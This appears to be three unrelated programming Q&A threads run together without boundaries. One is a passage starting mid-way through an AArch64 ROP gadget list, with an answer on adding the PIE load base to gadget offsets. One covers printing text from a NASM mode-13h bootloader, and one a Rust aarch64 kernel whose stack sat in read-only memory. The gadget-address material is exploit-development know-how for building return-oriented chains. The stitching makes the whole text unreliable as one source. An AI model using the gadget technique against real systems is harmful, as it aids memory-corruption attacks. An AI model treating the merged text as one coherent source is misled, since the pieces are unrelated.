mov x16, x1; br x16; ret; 0x0000000000000790: cbz x1, #0x7a8; adrp x2, #0x10000; ldr x2, [x2, #0xfe0]; cbz x2, 
#0x7a8; mov x16, x2; br x16; 0x000000000000079c: cbz x2, #0x7a8; mov x16, x2; br x16; 0x000000000000079c: cbz x2, #0x7a8; mov x16, x2; br x16; ret; 0x00000000000008f8: ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret; 0x00000000000008fc: ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret; 0x0000000000000900: ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret; 0x000000000000064c: ldp x29, x30, [sp], #0x10; ret; 0x00000000000007f0: ldp x29, x30, [sp], #0x20; ret; 0x0000000000000904: ldp x29, x30, [sp], #0x40; ret; 0x0000000000000864: ldp x29, x30, [sp], #0x60; ret; 0x000000000000072c: ldr x0, [x0, #0xfc8]; cbz x0, #0x738; b #0x6a0; ret; 0x000000000000075c: ldr x1, [x1, #0xfb8]; cbz x1, #0x76c; mov x16, x1; br x16; 0x000000000000075c: ldr x1, [x1, #0xfb8]; cbz x1, #0x76c; mov x16, x1; br x16; ret; 0x00000000000006a4: ldr x17, [x16, #0x10]; add x16, x16, #0x10; br x17; 0x00000000000006b4: ldr x17, [x16, #0x18]; add x16, x16, #0x18; br x17; 0x00000000000006c4: ldr x17, [x16, #0x20]; add x16, x16, #0x20; br x17; 0x00000000000006d4: ldr x17, [x16, #0x28]; add x16, x16, #0x28; br x17; 0x00000000000006e4: ldr x17, [x16, #0x30]; add x16, x16, #0x30; br x17; 0x0000000000000668: ldr x17, [x16, #0xff8]; add x16, x16, #0xff8; br x17; 0x0000000000000694: ldr x17, [x16, #8]; add x16, x16, #8; br x17; 0x0000000000000684: ldr x17, [x16]; add x16, x16, #0; br x17; 0x00000000000007ec: ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret; 0x0000000000000798: ldr x2, [x2, #0xfe0]; cbz x2, #0x7a8; mov x16, x2; br x16; 0x0000000000000798: ldr x2, [x2, #0xfe0]; cbz x2, #0x7a8; mov x16, x2; br x16; ret; 0x00000000000008d8: ldr x3, [x21, x19, lsl #3]; mov x2, x24; add x19, x19, #1; mov x1, x23; mov w0, w22; blr x3; 0x00000000000008e8: mov w0, w22; blr x3; 0x00000000000008e4: mov x1, x23; mov w0, w22; blr x3; 0x0000000000000764: mov x16, x1; br x16; 0x0000000000000764: mov x16, x1; br x16; 
ret; 0x00000000000007a0: mov x16, x2; br x16; 0x00000000000007a0: mov x16, x2; br x16; ret; 0x00000000000008dc: mov x2, x24; add x19, x19, #1; mov x1, x23; mov w0, w22; blr x3; 0x0000000000000644: mov x29, sp; bl #0x728; ldp x29, x30, [sp], #0x10; ret; 0x0000000000000918: mov x29, sp; ldp x29, x30, [sp], #0x10; ret; 0x0000000000000880: movz w0, #0; ldp x29, x30, [sp], #0x20; ret; 0x00000000000007e4: movz w0, #0x1; strb w0, [x19, #0x48]; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret; 0x0000000000000660: stp x16, x30, [sp, #-0x10]!; adrp x16, #0x10000; ldr x17, [x16, #0xff8]; add x16, x16, #0xff8; br x17; 0x0000000000000640: stp x29, x30, [sp, #-0x10]!; mov x29, sp; bl #0x728; ldp x29, x30, [sp], #0x10; ret; 0x0000000000000914: stp x29, x30, [sp, #-0x10]!; mov x29, sp; ldp x29, x30, [sp], #0x10; ret; 0x0000000000000874: str w0, [sp, #0x1c]; str x1, [sp, #0x10]; bl #0x83c; movz w0, #0; ldp x29, x30, [sp], #0x20; ret; 0x0000000000000878: str x1, [sp, #0x10]; bl #0x83c; movz w0, #0; ldp x29, x30, [sp], #0x20; ret; 0x00000000000007e8: strb w0, [x19, #0x48]; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret; 0x000000000000067c: nop; adrp x16, #0x11000; ldr x17, [x16]; add x16, x16, #0; br x17; 0x0000000000000830: nop; ldp x29, x30, [sp], #0x20; ret; 0x0000000000000860: nop; ldp x29, x30, [sp], #0x60; ret; 0x0000000000000678: nop; nop; adrp x16, #0x11000; ldr x17, [x16]; add x16, x16, #0; br x17; 0x000000000000090c: nop; ret; 0x0000000000000650: ret; In particular i am interested in both 0x00000000000008f8 and 0x00000000000008d8 gadgets. 
Elf file type is DYN (Shared object file) Entry point 0x6f0 There are 9 program headers, starting at offset 64 The output of the command readelf -l to find the base address of ELF file is: Program Headers: Type Offset VirtAddr PhysAddr FileSiz MemSiz Flags Align PHDR 0x0000000000000040 0x0000000000000040 0x0000000000000040 0x00000000000001f8 0x00000000000001f8 R 0x8 INTERP 0x0000000000000238 0x0000000000000238 0x0000000000000238 0x000000000000001b 0x000000000000001b R 0x1 [Requesting program interpreter: /lib/ld-linux-aarch64.so.1] LOAD 0x0000000000000000 0x0000000000000000 0x0000000000000000 0x0000000000000adc 0x0000000000000adc R E 0x10000 LOAD 0x0000000000000db8 0x0000000000010db8 0x0000000000010db8 0x0000000000000290 0x0000000000000298 RW 0x10000 DYNAMIC 0x0000000000000dc8 0x0000000000010dc8 0x0000000000010dc8 0x00000000000001e0 0x00000000000001e0 RW 0x8 NOTE 0x0000000000000254 0x0000000000000254 0x0000000000000254 0x0000000000000044 0x0000000000000044 R 0x4 GNU_EH_FRAME 0x0000000000000960 0x0000000000000960 0x0000000000000960 0x0000000000000054 0x0000000000000054 R 0x4 GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000 0x0000000000000000 0x0000000000000000 RW 0x10 GNU_RELRO 0x0000000000000db8 0x0000000000010db8 0x0000000000010db8 0x0000000000000248 0x0000000000000248 R 0x1 Section to Segment mapping: Segment Sections... 
00 01 .interp 02 .interp .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame 03 .init_array .fini_array .dynamic .got .got.plt .data .bss 04 .dynamic 05 .note.gnu.build-id .note.ABI-tag 06 .eh_frame_hdr 07 08 .init_array .fini_array .dynamic .got and the output of the info proc mappings in gdb is: Start Addr End Addr Size Offset objfile 0x5555555000 0x5555556000 0x1000 0x0 path_to _binary/binary_name 0x5555565000 0x5555566000 0x1000 0x0 path_to _binary/binary_name 0x5555566000 0x5555567000 0x1000 0x1000 path_to _binary/binary_name 0x7ff7e44000 0x7ff7fa1000 0x15d000 0x0 /usr/lib/aarch64-linux-gnu/libc-2.31.so 0x7ff7fa1000 0x7ff7fb1000 0x10000 0x15d000 /usr/lib/aarch64-linux-gnu/libc-2.31.so 0x7ff7fb1000 0x7ff7fb4000 0x3000 0x15d000 /usr/lib/aarch64-linux-gnu/libc-2.31.so 0x7ff7fb4000 0x7ff7fb7000 0x3000 0x160000 /usr/lib/aarch64-linux-gnu/libc-2.31.so 0x7ff7fb7000 0x7ff7fba000 0x3000 0x0 0x7ff7fcc000 0x7ff7fed000 0x21000 0x0 /usr/lib/aarch64-linux-gnu/ld-2.31.so 0x7ff7ff9000 0x7ff7ffb000 0x2000 0x0 0x7ff7ffb000 0x7ff7ffc000 0x1000 0x0 [vvar] 0x7ff7ffc000 0x7ff7ffd000 0x1000 0x0 [vdso] 0x7ff7ffd000 0x7ff7ffe000 0x1000 0x21000 /usr/lib/aarch64-linux-gnu/ld-2.31.so 0x7ff7ffe000 0x7ff8000000 0x2000 0x22000 /usr/lib/aarch64-linux-gnu/ld-2.31.so 0x7ffffdf000 0x8000000000 0x21000 0x0 [stack] How can i find out where the gadgets are actually loaded in memory ? Is that the issue ? What ropper is reporting ?
Your gadget is at 0x55555558f8. Ropper shows the addresses of gadgets the way the ELF header describes the memory layout of the binary. According to that header: The file contents 0x0-0xadc are to be mapped as r-x at address 0x0. The file contents 0xdb8-0x1048 are to be mapped as rw- at address 0x10db8. Account for page boundaries and you get one page mapping file offset 0x0 to address 0x0 as executable and two pages mapping file offset 0x0 to address 0x10000 as writeable. From your GDB dump, these mappings are created at 0x5555555000 and 0x5555565000 in the live process, respectively. The load base is therefore 0x5555555000, and every address Ropper reports has to be offset by it: 0x5555555000 + 0x8f8 = 0x55555558f8 (and likewise 0x8d8 becomes 0x55555558d8).
Bootloader with text and graphics: how to? (with NASM)
Below I have code that draws 3 circles in 3 different colors. That part works fine, but how do I add a text string? Thanks. I did some tests on VirtualBox (Windows), but with no luck. Any ideas on how to get it working? BITS 16 ORG 100h push 0a000h ;Video memory graphics segment pop es mov ax, 0013h ;320x200#8bpp int 10h push 0Eh ;Blue push 10 ;cX push 10 ;cY push 10 ;Radius call drawFilledCircle push 02h ;Blue push 40 ;cX push 40 ;cY push 30 ;Radius call drawFilledCircle push 06h ;Blue push 140 ;cX push 100 ;cY push 70 ;Radius call drawFilledCircle ;Wait for a key xor ah, ah int 16h loc db "KERNEL IMG" .LOOP: push cx mov cx, 0x000B ; eleven character name mov si, loc ; image name to find push di rep cmpsb ; test for entry match pop di ;je LOAD_FAT pop cx add di, 0x0020 ; queue next directory entry loop .LOOP ;jmp FAILURE ;Restore text mode mov ax, 0003h int 10h ;Return mov ax, 4c00h int 21h ;Color ;cX ;cY ;R drawFilledCircle: push bp mov bp, sp sub sp, 02h mov cx, WORD [bp+04h] ;R mov ax, cx mul ax ;AX = R^2 mov WORD [bp-02h], ax ;[bp-02h] = R^2 mov ax, WORD [bp+06h] sub ax, cx ;i = cY-R mov bx, WORD [bp+08h] sub bx, cx ;j = cX-R shl cx, 1 mov dx, cx ;DX = Copy of 2R .advance_v: push cx push bx mov cx, dx .advance_h: ;Save values push bx push ax push dx ;Compute (i-y) and (j-x) sub ax, WORD [bp+06h] sub bx, WORD [bp+08h] mul ax ;Compute (i-y)^2 push ax mov ax, bx mul ax pop bx ;Compute (j-x)^2 in ax, (i-y)^2 is in bx now add ax, bx ;(j-x)^2 + (i-y)^2 cmp ax, WORD [bp-02h] ;;(j-x)^2 + (i-y)^2 <= R^2 ;Restore values before jump pop dx pop ax pop bx ja .continue ;Skip pixel if (j-x)^2 + (i-y)^2 > R^2 ;Write pixel push WORD [bp+0ah] push bx push ax call writePx .continue: ;Advance j inc bx loop .advance_h ;Advance i inc ax pop bx ;Restore j pop cx ;Restore counter loop .advance_v add sp, 02h pop bp ret 08h ;Color ;X ;Y writePx: push bp mov bp, sp push ax push bx mov bx, WORD [bp+04h] mov ax, bx shl bx, 6 shl ax, 8 add bx, ax ;320 = 256 + 64 add bx, WORD [bp+06h] mov ax, WORD 
[bp+08h] ;TODO: Clip mov BYTE [es:bx], al pop bx pop ax pop bp ret 06h times 510-($-$$) db 0 ; Fill the rest with zeros dw 0xAA55 ; Boot loader signature
but how do i addmit a text string ? You've decided to use the 320x200 256 colors video mode 13h. To output text you can use every BIOS function that deals with text output, just like you would do on a text video screen. This video mode uses an 8x8 font and so you can position the cursor at any of the 40x25=1000 character cells. Example of writing a red colored capital B at the center of the screen: mov dx, 0C14h ;DH=12 row, DL=20 column mov bh, 0 ;BH=0 display page mov ah, 02h ;AH=02h set cursor position function int 10h ;video BIOS interrupt mov bx, 000Ch ;BH=0 display page, BL=12 red mov ax, 0E42h ;AH=0Eh teletype function, AL=66 capital B int 10h ;video BIOS interrupt
;=======================================================================
; Boot sector: VGA mode 13h filled circles plus a BIOS teletype message.
;
; Assembler : NASM, Intel syntax, flat binary (nasm -f bin)
; Target    : 16-bit real mode, image placed by the BIOS at 0000:7C00h
; CPU       : 80186 or later (uses `push imm16` and `shl reg, imm8`)
;
; Flow      : set up segments and stack -> switch to mode 13h -> draw three
;             circles -> print the greeting -> wait for a key -> draw a
;             fourth (clipped) circle -> park the CPU.
;
; There is no DOS underneath a boot sector, so there is no `int 21h`
; exit and nothing to return to: the program ends in a hlt loop.  Code
; and data are kept strictly apart so that execution can never run into
; the string bytes.
;=======================================================================
        BITS    16
        ORG     0x7C00

VIDEO_SEG       equ     0A000h          ; mode 13h frame buffer segment
SCREEN_W        equ     320             ; pixels per scan line
SCREEN_H        equ     200             ; scan lines
STACK_TOP       equ     7C00h           ; stack grows down from below the image

;-----------------------------------------------------------------------
; Entry point
;-----------------------------------------------------------------------
start:
        cli                             ; no interrupts while SS:SP is inconsistent
        xor     ax, ax
        mov     ds, ax                  ; DS = 0 so ORG 7C00h offsets address our data
        mov     ss, ax
        mov     sp, STACK_TOP
        sti
        cld                             ; lodsb in PutStr must walk upwards

        push    VIDEO_SEG               ; ES = video memory graphics segment
        pop     es

        mov     ax, 0013h               ; AH=00h set video mode, AL=13h 320x200, 8 bpp
        int     10h

        push    0Eh                     ; colour index 14 (yellow in the default palette)
        push    10                      ; cX
        push    10                      ; cY
        push    10                      ; radius
        call    drawFilledCircle

        push    02h                     ; colour index 2 (green in the default palette)
        push    40                      ; cX
        push    40                      ; cY
        push    30                      ; radius
        call    drawFilledCircle

        push    06h                     ; colour index 6 (brown in the default palette)
        push    140                     ; cX
        push    100                     ; cY
        push    70                      ; radius
        call    drawFilledCircle

main:
        mov     si, HelloWorld          ; DS:SI -> zero-terminated message
        call    PutStr

        xor     ah, ah                  ; AH=00h: block until a key is pressed
        int     16h

        push    01h                     ; colour index 1 (blue in the default palette)
        push    100                     ; cX
        push    90                      ; cY
        push    140                     ; radius; extends off-screen, writePx clips it
        call    drawFilledCircle

.hang:
        hlt                             ; sleep until the next interrupt ...
        jmp     .hang                   ; ... and never fall through into the routines

;-----------------------------------------------------------------------
; PutStr - print a zero-terminated string with the BIOS teletype service.
; In    : DS:SI = string, direction flag clear
; Out   : SI points just past the terminating zero
; Clobb : AX, BX, flags
;-----------------------------------------------------------------------
PutStr:
        mov     ah, 0Eh                 ; int 10h function: teletype output
        mov     bh, 00h                 ; display page 0
        mov     bl, 07h                 ; foreground colour used in graphics modes
.nextchar:
        lodsb                           ; AL = [DS:SI], SI += 1
        or      al, al                  ; end of string?
        jz      .return
        int     10h
        jmp     .nextchar
.return:
        ret                             ; required: hand control back to the caller

;-----------------------------------------------------------------------
; drawFilledCircle - plot every pixel within R of (cX, cY).
; Stack args (pushed in this order, removed by the callee):
;       Color, cX, cY, R
; Frame : [bp+0Ah]=Color  [bp+08h]=cX  [bp+06h]=cY  [bp+04h]=R
;         [bp-02h]=R^2 (local)
; Scans the square x in [cX-R, cX+R), y in [cY-R, cY+R) and keeps the
; points with dx^2 + dy^2 <= R^2.  All arithmetic is 16-bit, so R must
; be <= 181 (2*R^2 has to fit in 16 bits).  R = 0 draws nothing.
; Clobb : AX, BX, CX, DX, flags
;-----------------------------------------------------------------------
drawFilledCircle:
        push    bp
        mov     bp, sp
        sub     sp, 02h                 ; room for R^2

        mov     cx, WORD [bp+04h]       ; CX = R
        jcxz    .done                   ; R = 0 would make `loop` spin 65536 times

        mov     ax, cx
        mul     ax                      ; AX = R^2 (DX is clobbered, reloaded below)
        mov     WORD [bp-02h], ax

        mov     ax, WORD [bp+06h]
        sub     ax, cx                  ; AX = i = cY - R (current row)
        mov     bx, WORD [bp+08h]
        sub     bx, cx                  ; BX = j = cX - R (current column)

        shl     cx, 1                   ; CX = 2R rows to scan
        mov     dx, cx                  ; DX = 2R columns per row

.advance_v:
        push    cx                      ; save row counter
        push    bx                      ; save the row's starting column
        mov     cx, dx                  ; CX = column counter

.advance_h:
        push    bx                      ; keep i, j and 2R across the multiplies
        push    ax
        push    dx

        sub     ax, WORD [bp+06h]       ; AX = i - cY
        sub     bx, WORD [bp+08h]       ; BX = j - cX
        mul     ax                      ; AX = (i - cY)^2
        push    ax
        mov     ax, bx
        mul     ax                      ; AX = (j - cX)^2
        pop     bx                      ; BX = (i - cY)^2
        add     ax, bx                  ; AX = squared distance to the centre
        cmp     ax, WORD [bp-02h]       ; flags survive the pops below

        pop     dx
        pop     ax
        pop     bx
        ja      .continue               ; outside the circle: skip this pixel

        push    WORD [bp+0Ah]           ; Color
        push    bx                      ; X = j
        push    ax                      ; Y = i
        call    writePx

.continue:
        inc     bx                      ; next column
        loop    .advance_h

        inc     ax                      ; next row
        pop     bx                      ; back to the starting column
        pop     cx                      ; restore row counter
        loop    .advance_v

.done:
        add     sp, 02h
        pop     bp
        ret     08h                     ; drop the four word arguments

;-----------------------------------------------------------------------
; writePx - store one pixel into the mode 13h frame buffer, with clipping.
; Stack args (pushed in this order, removed by the callee):
;       Color, X, Y
; Frame : [bp+08h]=Color  [bp+06h]=X  [bp+04h]=Y
; In    : ES = VIDEO_SEG
; Pixels with X outside 0..319 or Y outside 0..199 are silently dropped;
; the unsigned compares also reject negative coordinates.
; Clobb : flags only (AX and BX are preserved)
;-----------------------------------------------------------------------
writePx:
        push    bp
        mov     bp, sp
        push    ax
        push    bx

        mov     bx, WORD [bp+04h]       ; BX = Y
        cmp     bx, SCREEN_H
        jae     .done                   ; off the top or bottom
        mov     ax, WORD [bp+06h]       ; AX = X
        cmp     ax, SCREEN_W
        jae     .done                   ; off the left or right

        mov     ax, bx
        shl     bx, 6                   ; Y * 64
        shl     ax, 8                   ; Y * 256
        add     bx, ax                  ; Y * 320  (320 = 256 + 64)
        add     bx, WORD [bp+06h]       ; + X
        mov     ax, WORD [bp+08h]       ; AL = colour index
        mov     BYTE [es:bx], al

.done:
        pop     bx
        pop     ax
        pop     bp
        ret     06h                     ; drop the three word arguments

;-----------------------------------------------------------------------
; Data (never reached by execution)
;-----------------------------------------------------------------------
HelloWorld      db      ' WELCOME !! Press Enter ', 10, 10, 0

        times   510-($-$$) db 0         ; pad the sector with zeros
        dw      0xAA55                  ; boot sector signature
Rustc/LLVM generates faulty code for aarch64 with opt-level=0
I have two files which are assembled/compiled/linked into minimalistic kernel. start.s: .set CPACR_EL1_FPEN, 0b11 << 20 .set BOOT_STACK_SIZE, 8 * 1024 .global __boot_stack .global __start .global __halt .bss .align 16 __boot_stack: .fill BOOT_STACK_SIZE .text __start: /* disable FP and SIMD traps */ mov x0, #CPACR_EL1_FPEN msr cpacr_el1, x0 /* set stack */ adr x0, __boot_stack add sp, x0, #BOOT_STACK_SIZE /* call the Rust entry point */ bl __boot __halt: /* halt CPU */ wfi b __halt boot.rs: #[no_mangle] pub extern fn __boot() { unsafe { let ptr = 0x9000000 as *mut u8; *ptr = '!' as u8; } } For opt-level=3 the resulting code outputs single '!' to a serial port (as was intended). For opt-level=0 I have a strange infinite loop (e.g. '!!!!!!!!!....'). Here is the disassembled dump of the problematic code: 0000000000000000 <__kernel_begin>: 0: d2a00600 mov x0, #0x300000 // #3145728 4: d5181040 msr cpacr_el1, x0 8: 100007c0 adr x0, 100 <__boot_stack> c: 9140081f add sp, x0, #0x2, lsl #12 10: 94000003 bl 1c <__boot> 0000000000000014 <__halt>: 14: d503207f wfi 18: 17ffffff b 14 <__halt> 000000000000001c <__boot>: 1c: a9bf7bfd stp x29, x30, [sp,#-16]! 20: 910003fd mov x29, sp 24: 94000003 bl 30 <aarch64::boot::__boot::__rust_abi> 28: a8c17bfd ldp x29, x30, [sp],#16 2c: d65f03c0 ret 0000000000000030 <aarch64::boot::__boot::__rust_abi>: 30: d10043ff sub sp, sp, #0x10 34: 52a12008 mov w8, #0x9000000 // #150994944 38: 2a0803e9 mov w9, w8 3c: f90007e9 str x9, [sp,#8] 40: 52800428 mov w8, #0x21 // #33 44: 39000128 strb w8, [x9] 48: 910043ff add sp, sp, #0x10 4c: d65f03c0 ret The code is tested using qemu-system-aarch64. I don't see serious problems with it (except redundancy). Can you suggest a possible cause of such abnormal behaviour? P.S. 
This is the optimised version which works properly: 0000000000000000 <__kernel_begin>: 0: d2a00600 mov x0, #0x300000 // #3145728 4: d5181040 msr cpacr_el1, x0 8: 1007ffc0 adr x0, 10000 <__boot_stack> c: 9140081f add sp, x0, #0x2, lsl #12 10: 94000003 bl 1c <__boot> 0000000000000014 <__halt>: 14: d503207f wfi 18: 17ffffff b 14 <__halt> 000000000000001c <__boot>: 1c: 52a12008 mov w8, #0x9000000 // #150994944 20: 52800429 mov w9, #0x21 // #33 24: 39000109 strb w9, [x8] 28: d65f03c0 ret
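I've managed to run the non-optimised code without abnormalities, thanks to Notlikethat for the idea: my stack was simply mapped into read-only memory. With the stack there, the `stp x29, x30, [sp,#-16]!` in the unoptimised `__boot` prologue cannot actually save the return address, so the later `ldp`/`ret` presumably returns to a bogus address and the kernel keeps re-running; the optimised build never touches the stack, which is why it was unaffected. To fix it, I added an offset statement to my linker script (`. = 1024M;`) so that all symbols start at 1 GiB (where RAM begins). After this modification the code started to work properly.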